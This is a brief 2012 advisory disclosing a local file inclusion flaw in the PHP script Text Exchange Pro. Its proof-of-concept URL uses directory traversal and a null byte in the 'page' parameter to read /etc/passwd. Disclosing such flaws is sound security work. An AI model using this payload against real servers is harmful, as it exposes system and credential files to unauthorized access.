----------------------------------------------------------- Text Exchange Pro (index.php page) Local file inclusion Bug discovered by Yakir Wizman Date 24/08/2012 Vendor Homepage - http://www.phpwebscripts.com/text-exchange-pro/ Demo - http://www.scripts-demo.com/textexchangepro/ ISRAEL ----------------------------------------------------------- Author will be not responsible for any damage. ----------------------------------------------------------- About the Application ----------------------------------------------------------- Text Exchange Pro is an unique PHP script for running your own text link exchange system. Proof Of Conecpt ----------------------------------------------------------- Local file inclusion (Severity is high) Vulnerable URL : http://server/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00Брой прочитания на тази страница: 1097
Text Exchange Pro (index.php page) Local File Inclusion